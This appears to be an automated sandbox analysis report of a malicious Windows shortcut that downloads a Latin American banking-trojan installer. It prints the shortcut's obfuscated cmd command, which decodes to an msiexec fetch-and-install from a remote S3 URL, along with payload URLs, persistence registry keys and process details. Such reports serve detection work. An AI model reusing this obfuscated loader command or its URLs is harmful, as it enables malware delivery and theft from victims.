Analysis
-
max time kernel
126s -
max time network
126s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
23-11-2021 15:26
Static task
static1
Behavioral task
behavioral1
Sample
23 de Novembro.lnk
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
23 de Novembro.lnk
Resource
win10-en-20211014
General
-
Target
23 de Novembro.lnk
-
Size
1KB
-
MD5
dbc89ba629ae4c675b9c77d6e2e7db23
-
SHA1
b27c719b2226145787b90a07494dc66b32817b4e
-
SHA256
0b58d3b97a11a82aafda54aa682cddc11cf513dbcf980a145a04c8b5a362ccdf
-
SHA512
7e5225364a21aae63a9aaef89aeb7994e0c902e81220a4e169463ccb32a17986858d2e53dd9208dea2c07012e4d24f891e67109ec1c2fd7337f2a40328853d86
Malware Config
Extracted
latam_generic_downloader
https://ym4dusty.s3.sa-east-1.amazonaws.com/softo.kn3
Signatures
-
Generic LATAM Downloader
Generic Latin American MSI downloader used to drop various banking trojans.
-
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeMsiExec.exeflow pid process 7 504 msiexec.exe 11 3220 MsiExec.exe -
Executes dropped EXE 1 IoCs
Processes:
fZFej.exepid process 3160 fZFej.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exefZFej.exeiexplore.exepid process 3220 MsiExec.exe 3220 MsiExec.exe 3160 fZFej.exe 3160 fZFej.exe 1992 iexplore.exe 1992 iexplore.exe -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 504 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Admin-_G404sGW = "\"C:\\Users\\Admin\\Saved Games\\Admin BNpCm\\fZFej.exe\"" iexplore.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Drops file in Windows directory 7 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5448.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID33F.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIDA15.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE59F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
iexplore.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString iexplore.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
iexplore.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion iexplore.exe -
Modifies Control Panel 2 IoCs
Processes:
fZFej.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\(Padrão) 2 = "fZFej" fZFej.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\(Padrão) 3 = "C:\\Users\\Admin\\Saved Games\\Admin BNpCm\\" fZFej.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msiexec.exeiexplore.exepid process 316 msiexec.exe 316 msiexec.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exeWMIC.exedescription pid process Token: SeShutdownPrivilege 504 msiexec.exe Token: SeIncreaseQuotaPrivilege 504 msiexec.exe Token: SeRestorePrivilege 504 msiexec.exe Token: SeTakeOwnershipPrivilege 504 msiexec.exe Token: SeSecurityPrivilege 316 msiexec.exe Token: SeCreateTokenPrivilege 504 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 504 msiexec.exe Token: SeLockMemoryPrivilege 504 msiexec.exe Token: SeIncreaseQuotaPrivilege 504 msiexec.exe Token: SeMachineAccountPrivilege 504 msiexec.exe Token: SeTcbPrivilege 504 msiexec.exe Token: SeSecurityPrivilege 504 msiexec.exe Token: SeTakeOwnershipPrivilege 504 msiexec.exe Token: SeLoadDriverPrivilege 504 msiexec.exe Token: SeSystemProfilePrivilege 504 msiexec.exe Token: SeSystemtimePrivilege 504 msiexec.exe Token: SeProfSingleProcessPrivilege 504 msiexec.exe Token: SeIncBasePriorityPrivilege 504 msiexec.exe Token: SeCreatePagefilePrivilege 504 msiexec.exe Token: SeCreatePermanentPrivilege 504 msiexec.exe Token: SeBackupPrivilege 504 msiexec.exe Token: SeRestorePrivilege 504 msiexec.exe Token: SeShutdownPrivilege 504 msiexec.exe Token: SeDebugPrivilege 504 msiexec.exe Token: SeAuditPrivilege 504 msiexec.exe Token: SeSystemEnvironmentPrivilege 504 msiexec.exe Token: SeChangeNotifyPrivilege 504 msiexec.exe Token: SeRemoteShutdownPrivilege 504 msiexec.exe Token: SeUndockPrivilege 504 msiexec.exe Token: SeSyncAgentPrivilege 504 msiexec.exe Token: SeEnableDelegationPrivilege 504 msiexec.exe Token: SeManageVolumePrivilege 504 msiexec.exe Token: SeImpersonatePrivilege 504 msiexec.exe Token: SeCreateGlobalPrivilege 504 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msiexec.exeMsiExec.exepid process 504 msiexec.exe 3220 MsiExec.exe 504 msiexec.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.execmd.execmd.exemsiexec.exeMsiExec.exefZFej.exedescription pid process target process PID 2816 wrote to memory of 3548 2816 cmd.exe cmd.exe PID 2816 wrote to memory of 3548 2816 cmd.exe cmd.exe PID 3548 wrote to memory of 3836 3548 cmd.exe cmd.exe PID 3548 wrote to memory of 3836 3548 cmd.exe cmd.exe PID 3836 wrote to memory of 504 3836 cmd.exe msiexec.exe PID 3836 wrote to memory of 504 3836 cmd.exe msiexec.exe PID 3836 wrote to memory of 656 3836 cmd.exe more.com PID 3836 wrote to memory of 656 3836 cmd.exe more.com PID 3836 wrote to memory of 1328 3836 cmd.exe cmd.exe PID 3836 wrote to memory of 1328 3836 cmd.exe cmd.exe PID 316 wrote to memory of 3220 316 msiexec.exe MsiExec.exe PID 316 wrote to memory of 3220 316 msiexec.exe MsiExec.exe PID 316 wrote to memory of 3220 316 msiexec.exe MsiExec.exe PID 3220 wrote to memory of 2084 3220 MsiExec.exe WMIC.exe PID 3220 wrote to memory of 2084 3220 MsiExec.exe WMIC.exe PID 3220 wrote to memory of 2084 3220 MsiExec.exe WMIC.exe PID 3160 wrote to memory of 1992 3160 fZFej.exe iexplore.exe PID 3160 wrote to memory of 1992 3160 fZFej.exe iexplore.exe PID 3160 wrote to memory of 1992 3160 fZFej.exe iexplore.exe PID 3160 wrote to memory of 1992 3160 fZFej.exe iexplore.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\23 de Novembro.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V/c "sET JIEX=^|morMiSEe +1 ^|cMiSEmMiSEd&&sET IeCXE=mMiSEsieMiSExec.eMiSExe /i httMiSEps://qMiSE9j.s3.eu-west-MiSE2.amazoMiSEnaws.com/setMiSEupMiSE.mMiSEsi&&sEt MAoK=!IeCXE:MiSE=!&&sEt ESxCa=!JIEX:MiSE=!&&cmd /c !MAoK! !ESxCa!"2⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\cmd.execmd /c msiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi |more +1 |cmd3⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\msiexec.exemsiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi4⤵
- Blocklisted process makes network request
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:504
-
-
C:\Windows\system32\more.commore +14⤵PID:656
-
-
C:\Windows\system32\cmd.execmd4⤵PID:1328
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 457278B14761D62B3F8D0AB15D9916B62⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe"C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Program Files (x86)\Internet explorer\iexplore.exe"C:\Program Files (x86)\Internet explorer\iexplore.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
cde8b5477d4c69e3b43b944b60936ca4
SHA16f105b786c112b947e96b0ad79f1636eaac5872b
SHA256ebc8d19537d9bc69c910958d38aeea7059de5c624d0a3db760ea61bce69f1b6d
SHA5126fa48acd8b7ea2bc7e0270651b1d2605385be211cfce0ce39f763ba96e560a5ccd4134feb2d5a4b05564d7b01a734b1f009e34e90bf2503cfc486bc51fcca196
-
MD5
1f26da52aea0b3dfe2e829665bd2474f
SHA1a852a99e2982df75842ccfc274ea3f9c54d22859
SHA25633a71ea2fd95ac5682a12fd55bea29afb77828b9cc10991f0a88600fbf335f32
SHA512dfc9574f115969f36e4ca3746355112030f0550b77bca1cc2a3cf73694a47964fd20359d178b0db81479f6bea6d7fa6e26470a7ad8d4300da2435b8ed6c14b1d
-
MD5
1f26da52aea0b3dfe2e829665bd2474f
SHA1a852a99e2982df75842ccfc274ea3f9c54d22859
SHA25633a71ea2fd95ac5682a12fd55bea29afb77828b9cc10991f0a88600fbf335f32
SHA512dfc9574f115969f36e4ca3746355112030f0550b77bca1cc2a3cf73694a47964fd20359d178b0db81479f6bea6d7fa6e26470a7ad8d4300da2435b8ed6c14b1d
-
MD5
fa1f3bca7ab6fe1cdcecfbfba69262d5
SHA1dc963018c7910bc0d1bd320ff4ce270b13f9434d
SHA256bf7bf5943ff1c731d18b27eb1622f8eab30a13d709c74de11ff46e60869bfa7a
SHA512c1b0ed4cda7e5f250efcecb505232f06bf2b6dd51badd5c6a3b08ef96333cba7fff7eb660e6a64873b0d13fc54fc872f0d908c99bd089650eccfafa1dd45c362
-
MD5
a76b0b64803b2686d55d2eeb9b9442c2
SHA1110c2962118aa0e52a84b801cfea78942ec12095
SHA2565967b8d98e036e290d727b345f753fc676f8dba882b1e21be996cd2c8eb68625
SHA512f33eeed547e470d15cd523115b9427d968ae66a7627a8a99e490b8a5a09c8cd891fe8e9513bce52e18975ae0b349275dba32f92407cacb18afc2c1f1f98f5fd5
-
MD5
9f1e5d66c2889018daef4aef604eebc4
SHA1b80294261c8a1635e16e14f55a3d76889ff2c857
SHA25602a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
SHA5128f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
-
MD5
9f1e5d66c2889018daef4aef604eebc4
SHA1b80294261c8a1635e16e14f55a3d76889ff2c857
SHA25602a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
SHA5128f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
-
MD5
248a1334a222f48b7cb37b2b02488e9f
SHA166ce82bc2ab0314528e564a53887099654db49fd
SHA25643f2f5c426cc7ed5b7bd05501d6bcdb26ddff07c851f9763740c94a3dff5c23d
SHA512b44422944fd76a05e2325bf651cc916c9148ff2e1ce2807878f1fa0b761fa5e3a96bd3e5163d14c2f6c986f42ca3dd845f426c01da10c3ae2b845f0b461ad54f
-
MD5
cf1daf8049f260f294de011c7d26a64d
SHA1c615acfbc84f09001c8b06d211799f75c035831d
SHA2563aea37228baa166990c3dd9932b007967bd1d92e820dc75c54dfe63b59636d3a
SHA512fd14709985906d6d49b398af081045da628994437390a11cf6f05e2228b078a8b2e9d03033d5fddc7ffa98c717c7a0681937bd59f93a190cc42246e140e79d2b
-
MD5
0a4d198c3699c8643197bad1329e66da
SHA195eca95cfcdb9a107a8bc1830a4ffc33733b4b09
SHA2566c52598af13a2851231e471762b059d8b6ebc1ce97a9d7d919df850c34819042
SHA5124239ebb7a396b97514039838fc346ec33439b1dd9839c5b51dc0b02c4bd92b4fc9e481f316946903f3dca005e065dccf06d69aa4c61e022b0ef7078a761f9e3a
-
MD5
e7a26add7faae332933adef51d05a39b
SHA1cf7578c89198cfba3978f3f269348895859fc653
SHA2563ad84e4e1d8647b716696a85572b14eed693b6100f1ecd60b7ce5ffd1d4a529d
SHA51226adc4050342777b90e667c068cf23e6f209330e160401510789a2366fd81e012a45923fc3d4985a29dfcbb94ac6319f0b2e77c8dabf931e7649bb3fe7518d5b
-
MD5
9f1e5d66c2889018daef4aef604eebc4
SHA1b80294261c8a1635e16e14f55a3d76889ff2c857
SHA25602a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
SHA5128f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
-
MD5
9f1e5d66c2889018daef4aef604eebc4
SHA1b80294261c8a1635e16e14f55a3d76889ff2c857
SHA25602a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
SHA5128f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b